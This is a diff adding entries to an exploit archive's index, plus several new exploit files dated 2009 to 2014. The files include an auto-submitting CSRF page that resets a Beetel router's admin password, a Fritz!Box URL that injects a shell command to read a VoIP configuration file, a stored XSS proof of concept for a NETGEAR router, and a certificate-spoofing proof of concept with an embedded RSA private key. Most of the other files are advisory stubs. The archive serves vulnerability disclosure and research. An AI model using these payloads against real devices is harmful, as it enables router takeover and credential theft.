Updated 05_02_2014

files.csv

@@ -29808,8 +29808,10 @@ id,file,description,date,author,platform,type,port
 33064,platforms/multiple/remote/33064.txt,"Google Chrome <= 0.3.154 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability",2009-06-03,MustLive,multiple,remote,0
 33065,platforms/php/webapps/33065.txt,"Horde 3.1 'Passwd' Module Cross Site Scripting Vulnerability",2009-06-05,anonymous,php,webapps,0
 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 'avPreview.ocx' ActiveX Control Buffer Overflow Vulnerability",2009-06-06,Satan_HackerS,windows,remote,0
+33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 'GetURL()' Arbitrary File Download Vulnerability",2009-06-08,"Diego Juarez",multiple,remote,0
 33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 'text' Parameter Cross Site Scripting Vulnerability",2009-06-06,"599eme Man",php,webapps,0
 33069,platforms/windows/local/33069.rb,"Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,metasploit,windows,local,0
+33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution Exploit",2014-04-28,LOTFREE,php,webapps,80
 33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0
 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80
 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123
@@ -29818,11 +29820,15 @@ id,file,description,date,author,platform,type,port
 33077,platforms/linux/dos/33077.c,"MySQL <= 5.0.75 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0
 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services zl ST.1.0.090213 Module CRL Security Bypass Vulnerability",2009-06-13,anonymous,multiple,remote,0
 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 'console-help.portal' Cross Site Scripting Vulnerability",2009-06-14,"Alexandr Polyakov",multiple,remote,0
+33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 Database Network Foundation Heap Memory Corruption Vulnerability",2009-06-14,"Dennis Yurichev",multiple,dos,0
 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database CVE-2009-1019 Remote Network Authentication Vulnerability",2009-06-14,"Dennis Yurichev",multiple,remote,0
 33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search 'search_p_groups' Parameter Cross Site Scripting Vulnerability",2009-06-14,"Alexandr Polyakov",multiple,remote,0
+33083,platforms/multiple/dos/33083.txt,"Oracle 9i/10g Database TNS Command Remote Denial of Service Vulnerability",2009-06-14,"Dennis Yurichev",multiple,dos,0
+33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database CVE-2009-1020 Network Foundation Remote Vulnerability",2009-06-14,"Dennis Yurichev",multiple,remote,0
 33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader 'id' Parameter Cross Site Scripting Vulnerability",2009-06-14,Moudi,php,webapps,0
 33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 Invalid Query Remote Denial of Service Vulnerability",2009-06-06,"Luigi Auriemma",multiple,dos,0
 33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 'request.php' SQL Injection Vulnerability",2009-06-16,boom3rang,php,webapps,0
+33088,platforms/linux/dos/33088.txt,"Linux Kernel 2.6.30 'tun_chr_pool()' NULL Pointer Dereference Vulnerability",2009-06-17,"Christian Borntraeger",linux,dos,0
 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0
 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69
 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80
@@ -29830,8 +29836,13 @@ id,file,description,date,author,platform,type,port
 33096,platforms/multiple/dos/33096.txt,"Crysis 1.21/1.5 HTTP/XML-RPC Service Access Violation Remote Denial of Service Vulnerability",2009-06-20,"Luigi Auriemma",multiple,dos,0
 33097,platforms/php/webapps/33097.txt,"Programs Rating rate.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0
 33098,platforms/php/webapps/33098.txt,"Programs Rating postcomments.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0
+33099,platforms/multiple/dos/33099.txt,"World in Conflict 1.0.1 Typecheck Remote Denial of Service Vulnerability",2009-06-16,"Luigi Auriemma",multiple,dos,0
+33100,platforms/multiple/dos/33100.txt,"S.T.A.L.K.E.R. Clear Sky 1.0010 - Remote Denial of Service Vulnerability",2009-06-22,"Luigi Auriemma",multiple,dos,0
+33101,platforms/linux/dos/33101.txt,"Mozilla Firefox <= 3.0.11 and Thunderbird <= 2.0.9 - RDF File Handling Remote Memory Corruption Vulnerability",2009-06-21,"Christophe Charron",linux,dos,0
 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 Web Mail URI Parsing HTML Injection Vulnerability",2009-06-23,"Andrea Purificato",php,webapps,0
 33103,platforms/linux/remote/33103.html,"Mozilla Firefox <= 3.5.1 Error Page Address Bar URI Spoofing Vulnerability",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0
+33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 Remote Denial of Service Vulnerability",2009-06-24,"Luigi Auriemma",multiple,dos,0
+33105,platforms/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos,0
 33106,platforms/php/webapps/33106.txt,"PG MatchMaking browse_ladies.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
 33107,platforms/php/webapps/33107.txt,"PG MatchMaking browse_men.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
 33108,platforms/php/webapps/33108.txt,"PG MatchMaking search.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
@@ -29841,3 +29852,25 @@ id,file,description,date,author,platform,type,port
 33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution quick_search.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0
 33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution viewprofile.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0
 33114,platforms/php/webapps/33114.txt,"Almond Classifieds Component for Joomla! 7.5 Cross-Site Scripting and SQL-Injection Vulnerabilities",2009-06-27,Moudi,php,webapps,0
+33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products index.php replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0
+33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products index.php Multiple Parameter XSS",2009-06-27,Moudi,php,webapps,0
+33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro gmap.php addr Parameter XSS",2009-06-27,Moudi,php,webapps,0
+33118,platforms/multiple/remote/33118.html,"Apple Safari 4.0.1 Error Page Address Bar URI Spoofing Vulnerability",2009-06-27,"Juan Pablo Lopez Yacubian",multiple,remote,0
+33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining courses_login.php cat_id Parameter XSS",2009-06-24,Moudi,php,webapps,0
+33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining news_read.php id Parameter XSS",2009-06-24,Moudi,php,webapps,0
+33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining lessons_login.php Multiple Parameter XSS",2009-06-24,Moudi,php,webapps,0
+33122,platforms/php/webapps/33122.txt,"Joomla! 'com_user' Component 'view' Parameter URI Redirection Vulnerability",2009-06-27,"599eme Man",php,webapps,0
+33123,platforms/multiple/remote/33123.html,"Google Chrome  Google Chrome 2.0.172 'About:blank' Address Bar URI Spoofing Vulnerability'About:blank' Address Bar URI Spoofing Vulnerability",2009-06-28,Lostmon,multiple,remote,0
+33124,platforms/multiple/remote/33124.txt,"Google Chrome 2.0.172 'chrome://history/' URI Cross-Site Scripting Vulnerability",2009-06-28,"Karn Ganeshen",multiple,remote,0
+33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component 'id' Parameter SQL Injection Vulnerability",2009-06-28,Prince_Pwn3r,php,webapps,0
+33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x 'index.php' Cross Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0
+33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0
+33128,platforms/linux/remote/33128.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-06-30,"Dan Kaminsky",linux,remote,0
+33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF Vulnerability",2014-04-30,"shyamkumar somana",hardware,webapps,80
+33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional Multiple Cross Site Scripting Vulnerabilities",2009-06-30,"Ivan Sanchez",php,webapps,0
+33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0
+33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 'cat_products.php' SQL Injection Vulnerability",2009-07-30,MizoZ,php,webapps,0
+33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player <= 10.0.22 and AIR URI Parsing Heap Buffer Overflow Vulnerability",2009-07-30,iDefense,multiple,dos,0
+33134,platforms/linux/dos/33134.txt,"Adobe Flash Player <= 10.0.22 and AIR - 'intf_count' Integer Overflow Vulnerability",2009-07-30,"Roee Hay",linux,dos,0
+33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0
+33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS Vulnerability",2014-05-01,"Dolev Farhi",hardware,webapps,0

platforms/hardware/webapps/33129.html

@@ -0,0 +1,50 @@
+??<!--
+# Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
+Forgery Vulnerability
+# Date: 30/04/2014
+# Exploit Author: shyamkumar somana
+# Vendor Homepage: www.beetel.in
+# Version: 450TC2 - Firmware version : TX6-0Q-005_retail
+# Tested on: Windows 8
+
+#Beetel 450TC2 Router is vulnerable for cross site request forgery
+vulnerability in change password page.
+#Affected Resource/Form : Forms/tools_admin_1
+
+
+###################################################################################
+
+Post Request:
+
+POST /Forms/tools_admin_1 HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101
+Firefox/29.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.1/maintenance/tools_admin.htm
+Authorization: Basic YWRtaW46c3lhbXNvbWFuYQ==
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+
+uiViewTools_Password=NEW_PASSWORD&uiViewTools_PasswordConfirm=NEW_PASSWORD
+
+###################################################################################
+
+#Exploit:
+-->
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
+      <input type="hidden" name="uiViewTools_Password" value="123456789" />
+      <input type="hidden" name="uiViewTools_PasswordConfirm" value="123456789" />
+      <input type="submit" value="Submit form" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>

platforms/hardware/webapps/33136.txt

@@ -0,0 +1,9 @@
+App : Fritz!Box
+Author : 0x4148
+
+Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw
+
+Poc :
+https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
+
+#0x4148_rise

platforms/hardware/webapps/33138.txt

@@ -0,0 +1,44 @@
+# Exploit Title: Stored XSS Vulnerability in NETGEAR DGN2200 Web interface
+
+# Date 30/04/2014
+
+# Exploit author: Dolev Farhi @f1nhack
+
+# Vendor homepage: http://netgear.com
+
+# Affected Firmware version: 1.0.0.29_1.7.29_HotS
+
+# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
+
+
+
+
+Summary
+=======
+NETGEAR DGN2200 ADSL router web interface suffers from persistent XSS vulnerability in the QoS(Quality of Service) Administration page under 'Expert Mode'.
+
+
+
+Vulnerability Description
+=========================
+Persistent Cross Site Scripting
+
+
+
+Steps to reproduce / PoC:
+=========================
+1. Login to the router web interface
+
+2. Enter expert mode
+
+3. navigate to QoS page
+
+4. Add QoS Rule, or Edit an existing one.
+
+5. in "QoS Policy for: " Enter the following: <script>alert("XSS")</script> and click apply.
+
+6. go to another page and navigate back into QoS - the XSS error pops up.
+	- PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70
+	
+	
+

platforms/linux/dos/33088.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35724/info
+
+The Linux kernel is prone to a local NULL-pointer dereference vulnerability.
+
+A local attacker can exploit this issue to execute arbitrary code with superuser privileges or crash an affected kernel, denying service to legitimate users.
+
+This issue was introduced in Linux kernel 2.6.30. 
+
+http://www.exploit-db.com/sploits/33088-1.tgz
+http://www.exploit-db.com/sploits/33088-2.tgz

platforms/linux/dos/33101.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35775/info
+
+Mozilla Firefox and Thunderbird are prone to a remote memory-corruption vulnerability that attackers can exploit to cause denial-of-service conditions and possibly execute arbitrary code.
+
+The vulnerability is fixed in Firefox 3.0.12 and 3.5. Note that Thunderbird is also affected but Mozilla hasn't specified the vulnerable and fixed versions.
+
+This vulnerability was previously covered in BID 35758 (Mozilla Firefox MFSA 2009-34, -35, -36, -37, -39, -40 Multiple Vulnerabilities) but has been assigned its own record to better document the issue.
+
+http://www.exploit-db.com/sploits/33101.zip

platforms/linux/dos/33134.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35907/info
+
+Adobe Flash Player and Adobe AIR are prone to an integer-overflow vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
+
+This issue was previously covered in BID 35890 (Adobe Flash Player and AIR Multiple Security Vulnerabilities) but has been given its own record to better document it.
+
+UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed.
+
+This issue affects versions *prior to* the following:
+
+Flash Player 10.0.32.18
+AIR 1.5.2 
+
+http://www.exploit-db.com/sploits/33134.zip

platforms/linux/remote/33128.txt

@@ -0,0 +1,155 @@
+source: http://www.securityfocus.com/bid/35888/info
+
+Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
+
+The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
+
+Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
+
+NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
+
+Private-Key: (1024 bit)
+modulus:
+    00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
+    5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
+    c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
+    6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
+    72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
+    29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
+    bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
+    93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
+    ce:f0:82:33:d8:76:06:4c:9f
+publicExponent: 65537 (0x10001)
+privateExponent:
+    00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
+    3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
+    6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
+    51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
+    c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
+    06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
+    35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
+    28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
+    57:2c:78:a9:42:b2:49:d8:71
+prime1:
+    00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
+    0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
+    2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
+    96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
+    e6:3a:40:99:03
+prime2:
+    00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
+    17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
+    e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
+    c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
+    49:79:53:35:35
+exponent1:
+    15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
+    66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
+    8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
+    88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
+    77:eb:0d:c1
+exponent2:
+    5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
+    be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
+    78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
+    85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
+    2d:92:6e:ed
+coefficient:
+    00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
+    8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
+    a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
+    12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
+    e6:c2:29:86:17
+Certificate Request:
+    Data:
+        Version: 0 (0x0)
+        Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (1024 bit)
+                Modulus (1024 bit):
+                    00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
+                    5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
+                    c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
+                    6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
+                    72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
+                    29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
+                    bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
+                    93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
+                    ce:f0:82:33:d8:76:06:4c:9f
+                Exponent: 65537 (0x10001)
+        Attributes:
+            a0:00
+    Signature Algorithm: md5WithRSAEncryption
+        64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
+        c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
+        a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
+        0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
+        d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
+        70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
+        f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
+        a2:dc
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
+B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
+E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
+AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
+UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
+gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
+mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
+5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
+HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
+19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
+OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
+IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
+g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
+-----END RSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE REQUEST-----
+MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
+aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
+BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
+Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
+ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
+HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
+n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
+DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
+ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
+4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
+otw=
+-----END CERTIFICATE REQUEST-----
+-----BEGIN CERTIFICATE-----
+MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
+RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
+VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
+Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
+aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
+aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
+DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
+MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
+BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
+VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
+Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
+iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
+82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
+Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
+Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
+A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
+TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
+A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
+bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
+ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
+LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
+MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
+L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
+dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
+CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
+bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
+cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
+ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
+MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
+Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
+BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
+gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
+Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
+p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
+-----END CERTIFICATE-----

platforms/multiple/dos/33080.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35677/info
+
+Oracle Database is prone to a remote heap memory-corruption vulnerability in Network Foundation.
+
+The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker doesn't require privileges to exploit this vulnerability.
+
+Successfully exploiting this issue will allow the attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. 
+
+http://www.exploit-db.com/sploits/33080.zip

platforms/multiple/dos/33083.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35683/info
+
+Oracle Database is prone to a remote vulnerability affecting the 'Listener' component.
+
+The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker doesn't require privileges to exploit this vulnerability.
+
+The attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+The following are vulnerable:
+
+Oracle9i 9.2.0.8 and 9.2.0.8DV
+Oracle10g 10.1.0.5 and 10.2.0.4
+Oracle11g 11.1.0.7
+
+Other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/33083.zip

platforms/multiple/dos/33099.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35751/info
+
+World in Conflict is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
+
